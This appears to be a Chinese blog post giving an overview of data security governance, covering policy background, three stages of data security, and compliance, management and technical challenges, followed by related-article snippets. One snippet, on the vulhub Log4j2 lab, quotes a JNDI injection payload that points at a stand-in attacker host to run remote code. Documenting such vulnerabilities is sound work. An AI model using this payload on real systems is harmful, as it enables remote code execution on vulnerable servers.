数据安全治理【概述】

news2024/11/26 5:22:38

数据安全治理,顾名思义,可拆分为“数据安全”与“治理”数据安全可理解为目标,治理可理解为手段。具体定义:数据安全治理是指在组织数据安全战略的指导下,为确保组织数据处于有效保护和合法利用的状态,以及具备保障持续安全状态的能力,内外部相关方协作实施的一系列活动集合。包括建立组织数据安全治理组织架构,制定数据安全制度规范,构建数据安全技术体系,建设数据安全人才梯队等。

日常项目中主要是:面向组织的数据安全治理,通过治理活动,确保数据安全,推动发展与安全一体两翼、平衡发展。

一、数据安全发展背景

随着数据逐渐变成新时代生产生活的支柱,数据安全也日益成为保障经济发展、社会稳定和国家安全的重要基石。据最新调查数据显示,2022年数据安全市场规模为102亿,同比增长15%,预计2023年我国数据安全市场规模将达109.5亿元。

2023 年 2 月,中共中央、国务院印发《数字中国建设整体布局规划》( 以下简称《规划》)。《规划》明确,数字中国建设按照“2522”的整体框架进行布局,即夯实数字基础设施和数据资源体系“两大基础”,推进数字技术与经济、政治、文化、社会、生态文明建设“五位一体”深度融合,强化数字技术创新体系和数字安全屏障“两大能力”,优化数字化发展国内国际“两个环境”。其中,对于数据安全能力提出了“筑牢可信可控的数字安全屏障”全面要求。

同年,工业和信息化部等十六部门发布的《关于促进数据安全产业发展的指导意见》也提出了推动数据安全产业高质量发展,全面加强数据安全产业体系和能力,夯实数据安全治理基础,促进以数据为关键要素的数字经济健康快速发展的指导要求。

二、数据安全发展阶段

随着技术的发展,对于数据安全的需求和解决方法也经历了多次的变革。从早期主要关注组织内部的数据防护,到如今的全球范围内的数据安全管理,数据安全的演变历程揭示了技术、法规、政策和人类需求间的紧密交织关系。

  • 数据安全1.0时代:信息安全中的数据安全

这一阶段的数据安全主要围绕组织内部的数据进行。它重视静态数据防护,针对单一系统如内网数据库和文件共享系统提供保护。核心解决方案包括数据库审计系统、数据库防火墙和DLP等。

  • 数据安全2.0时代:网络安全中的数据安全

随着组织之间的数据交流日益增加,数据安全开始涉及更多的领域和技术。在这个阶段,数据不仅仅是静态存储,还涉及到数据在传输中的安全,因此"Data in Transit""Data in Use"的保护变得尤为重要。解决方案则包括数据分级分类、综合数据安全平台和IAM等。

  • 数据安全3.0时代:数字安全中的数据安全

进入数字时代,数据不再仅仅是企业的资产,更成为了国家战略资源。涉及的场景包括物联网、元宇宙、AI等前沿技术领域。此时,不仅仅是数据的防护,更多的是如何在全球范围内确保数据的合规流动,满足各国的法规标准。

随着时间的推进,数据安全的观念从技术防护转变为生命周期的全面管理,从组织内部的访问控制转向全球数据流的法规合规。这一演变历程不仅展现了数据安全领域的不断进步,也预示着未来的数据安全将面临更为复杂的挑战和机遇。

三、数据安全治理面临的挑战与痛点

组织机构开展数据安全治理面临的主要问题是合规、管理和技术三方面的。

3.1 合规角度

随着《中华人民共和国网络安全法》( 以下简称《网络安全法》)、《数据安全法》《中华人民共和国个人信息保护法》(以下简称《个人信息保护法》)等相关法律法规的颁布实施以及配套规范性文件的落地执行,围绕数据与隐私保护的法律合规体系日趋成熟。加强企业数据安全合规管理已成为当下企业发展的基础和必要条件。

3.2 管理角度

企业管理措施及能力决定了数据安全治理中技术措施落地和执行的效果,通过规划合理的制度要求及管理手段,但是在实际执行中管理层面的挑战同样不可小觑。

数据安全责任落实难。不论是网络安全还是数据安全,企业的安全责任落实面临层层困难。结合数据的无形、多态、流转等特性导致数据安全责任落实更加困难。主要特性包括数据安全责任人职级较低,缺少数据安全专职管理部门,数据安全专项预算较少,数据安全管理手段粗放等。

数据安全管理模式落后。大部分业务依旧停留在网络安全时代,安全管理模式主要以先建再补、线上再修等方式为主,同时普遍保持业务第一原则,认为业务高于安全。实际上安全左移已经是业界最佳实现的共识。通过安全左移,在降低整体安全风险的同时,亦降低整体安全与业务的资源投入。

管理制度难以落地。随着日趋成熟的法治合规环境下,国内外与各行业陆续出台多种数据安全管理体系与数据安全治理体系的最佳实践与国家行业标准。但大部分企业很难真正将标准与最佳实现应用在企业内部治理,昂贵的咨询项目往往产出的最大价值仍然是一套无人触及的制度文档。企业依旧需要投入大量资源进行企业治理架构与安全治理架构的融合,业务战略目标与安全管理目标的匹配。

3.3 技术角度

当前,企业安全技术主要停留在网络安全技术,主要原因是数据安全的关键性技术在近几年才兴起。数据安全技术主要应用于数据本身或数据载体,工程化与产品化需要一定的时间与经验积累。数据安全技术是数据安全治理的重要建设环节,但当前数据安全技术的应用过程中面临众多挑战,主要体现在以下3点:

1、在新技术引入(云计算、AI)时,引发新的数据安全风险;

2、对数据安全技术选择有限,数据安全技术融合了密码学、隐私计算、网络安全、内容识别、安全合规以及信息与风险管理仍要突破和验证,企业内的普及依旧较低。

3、大数据时代带来的技术难题。企业在数字化转型的过程中,往往面临着海量数据、每日PB级新增数据量以及高频的数据流动,传统管理手段以及基于人工和流程的风险识别与评估手段已经完全无法支撑如此量级和频次下的数据治理工作。数据资产识别、数据分类分级等工作据需要通过技术能力来支持。

(该系列持续更新)

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1456915.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

vulhub中Apache Log4j2 lookup JNDI 注入漏洞(CVE-2021-44228)

Apache Log4j 2 是Java语言的日志处理套件,使用极为广泛。在其2.0到2.14.1版本中存在一处JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似于${jndi:ldap://evil.com/example}的lookup用于进行JNDI注入,执行任意代码。…

Java学习小记——多线程Socket编程

目录 线程池线程池介绍线程池的参数 Java线程池ExecutorTester服务器socket编程普通socket编程线程池并行处理客户请求Java NIO异步处理客户请求 线程池 线程池介绍 在创建一个线程时存在一定的开销,创建线程的开销相比于一般的算法来说较大。首先需要建立一个调用…

如何在Windows 10中启用或关闭Windows功能?这里有详细步骤

Windows 10是一个拥有数百种功能的大型操作系统。与任何其他操作系统或软件一样,大多数PC用户从未使用Windows 10中提供的所有功能。例如,内置的XPS Viewer对大多数PC用户来说都是陌生的,尽管它自Windows7推出以来就一直存在。 高级PC用户通…

mybatis 基础入门使用

1、mybatis 简介 1.1、mybatis 特性 MyBatis 是支持定制化 SQL、存储过程以及高级映射的优秀的持久层框架; MyBatis 避免了几乎所有的 JDBC 代码和手动设置参数以及获取结果集; MyBatis可以使用简单的XML或注解用于配置和原始映射,将接口和…

百度云AI

百度云AI概述 Face腾讯优图科大讯飞 百度人脸识别基于深度学习的人脸识别方案,准确识别图片中的人脸信息,提供如下功能: 人脸检测:精准定位图中人脸,获得眼、口、鼻等72个关键点位置,分析性别、年龄、表…

CI/CD部署

什么是CI,什么是CD CI和CD是软件开发中持续集成和持续交付的缩写。 CI代表持续集成(Continuous Integration),是一种实践,旨在通过自动化构建、测试和代码静态分析等过程,频繁地将代码变更合并到共享存储…

ArcGIS API for JavaScript 4.X 本地部署(js,字体)

0 目录(4.19) /4.19/ 1 修改文件 1.1 init.js 编辑器打开/4.19/init.js搜索文本[HOSTNAME_AND_PATH_TO_JSAPI],然后将其连同前面的https://替换为http://ip地址/4.19,可以是localhost,只能本机引用 替换后&#xff…

【软考高级信息系统项目管理师--第二十章:高级项目管理】

🚀 作者 :“码上有前” 🚀 文章简介 :软考高级–信息系统项目管理师 🚀 欢迎小伙伴们 点赞👍、收藏⭐、留言💬 第二十章:高级项目管理 项目集管理项目组合管理组织级项目管理OPM&…

AI提示工程实战:从零开始利用提示工程学习应用大语言模型【文末送书-19】

文章目录 背景什么是提示工程?从零开始:准备工作设计提示调用大语言模型 实际应用示例文字创作助手代码生成持续优化与迭代数据隐私与安全性可解释性与透明度总结 AI提示工程实战:从零开始利用提示工程学习应用大语言模型【文末送书-19】⛳粉…

【软考问题】-- 10 - 知识精讲 - 项目风险管理

一、基本问题 1:按照可预测性,风险分哪三类? (1)已知风险:如项目目标不明确, 过分乐观的进度计划, 设计或施工变更和材料价格波动等。(2)可预测风险&#xff…

跟着pink老师前端入门教程(JavaScript)-day01

一、计算机编程基础 (一)编程语言 1、编程 编程:就是让计算机为解决某个问题而使用某种程序设计语言编写程序代码,并最终得到结果的过程。 计算机程序:就是计算机所执行的一系列的指令集合,而程序全部…

spfa的特殊用法

spfa通常用来求带有负权边的最短路问题,但是它还有两种特别的用法——求负环和求差分约束 求负环 我们回顾spfa算法,本质上是一个点的距离被更新以后再用它去更新其他的点。将被更新的点放入队列中,这样一直更新,直到没有任何点…

Stable Diffusion系列(六):原理剖析——从文字到图片的神奇魔法(潜空间篇)

文章目录 LDM概述原理模型架构自编码器模型扩散模型条件引导模型图像生成过程 实验结果指标定义IS(越大越好)FID(越小越好) 训练成本与采样质量分析不带条件的图片生成基于文本的图片生成基于语义框的图片生成基于语义图的图片生成…

金蝶云星空——用递归SQL查询物料分组

应用场景: 金蝶物料分组为树形结构,需要根据SQL查询同步到第三方系统中。 技术实现 用递归CTE按照树状结构展开物料分组 with cte as( select 0 as 物料分组层级,t1.FID,case when isnull(t1.FFULLPARENTID,) then .CAST(t1.FID AS VARCHAR(…

K8s进阶之路-核心概念/架构:

架构:Master/Node Master组件--主控节点{ 负责集群管理(接收用户事件转化成任务分散到node节点上)} Apiserver: 资源操作的唯一入口,提供认证、授权、API注册和发现等机制 Scheduler : 负责集群资源调度&am…

K8s进阶之路-安装部署K8s

参考:(部署过程参考的下面红色字体文档链接就可以,步骤很详细,重点部分在下面做了标注) 安装部署K8S集群文档: 使用kubeadm方式搭建K8S集群 GitBook 本机: master:10.0.0.13 maste…

三防工业平板丨亿道加固平板定制丨三防平板电脑丨提升后勤管理

企业的后勤管理对于运作高效的商业模式至关重要。随着科技的不断发展,加固平板成为提升企业后勤水平的一项关键措施。本文将探讨加固平板在企业后勤管理中的应用和优势,并阐述如何利用这一技术提升企业的运营效率和竞争力。 一、三防加固平板的定义和功能…

通用二进制方式安装MySQL8.0.x

一、必要说明 1、系统:openEuler操作系统 2、版本:MySQL - 8.0.36 3、下载地址:https://dev.mysql.com/get/Downloads/MySQL-8.0 二、安装步骤 1、下载glibc版本的Mysql [rootnode2 ~]# wget -c https://dev.mysql.com/get/Downloads/MySQ…

《乱弹篇(十六)知不言》

日本电影《我的男人》,是伦理情色类型片。故事讲述,一个小姑娘在地震后失去了亲人,她被远房亲戚(一位消防员收养)。 图:来源电影《我的男人》广告 两人一起生活,难免日久生情,于是便…

【Jvm】运行时数据区域(Runtime Data Area)原理及应用场景

文章目录 前言:Jvm 整体组成 一.JDK的内存区域变迁Java8虚拟机启动参数 二.堆0.堆的概念1.堆的内存分区2.堆与GC2.1.堆的分代结构2.2.堆的分代GC2.3.堆的GC案例2.4.堆垃圾回收方式 3.什么是内存泄露4.堆栈的区别5.堆、方法区 和 栈的关系 三.虚拟机栈0.虚拟机栈概念…